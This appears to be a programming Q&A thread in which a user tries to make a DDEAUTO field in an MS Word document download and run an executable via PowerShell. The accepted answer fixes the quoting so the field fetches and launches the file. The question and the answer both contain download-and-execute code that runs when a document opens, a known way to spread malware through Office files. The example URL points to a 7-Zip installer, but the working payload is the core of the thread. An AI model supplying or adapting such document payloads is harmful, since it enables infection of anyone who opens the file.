# Start Process : A positional parameter can not be found that accepts argument 'f'

Tags: powershell, cmd, dde

I am trying to create a DDEAUTO script in MS Word to download and execute a file.

The code is following:

```
{
    DDEAUTO 
    "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://www.7-zip.org/a/7z1701-x64.exe', 'file.exe')
    Start-Process 'file.exe' " "Message Text"
}
```

The script downloads the file as file.exe but doesn't execute.

I get an error saying :

> Start Process : A positional parameter can not be found that accepts argument 'f'

The same code works completely if I use it directly in the PowerShell but not when I am calling it from MS Word.

The following is the screenshot of the error:

[image: error]

Comment: Please show the actual code you execute - according to the errors you invoke `Start-Process 'mess.exe' .EXE f`

Comment: That is exactly what I find weird, I have not used any 'f' in my code.
The code is exactly what I have posted above

Answer (score 0, accepted):

You need to put the code you want powershell to execute inside the quotation marks.

```
{
DDEAUTO c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe "(New-Object System.Net.WebClient).DownloadFile('http://www.7-zip.org/a/7z1701-x64.exe', 'file.exe'); 
    start-process 'file.exe'"
}
```

Oh, and if you wanna run multiple commands, they need to be semicolon(;) seperated.

Comment: That Fixed it. Thanks a lot.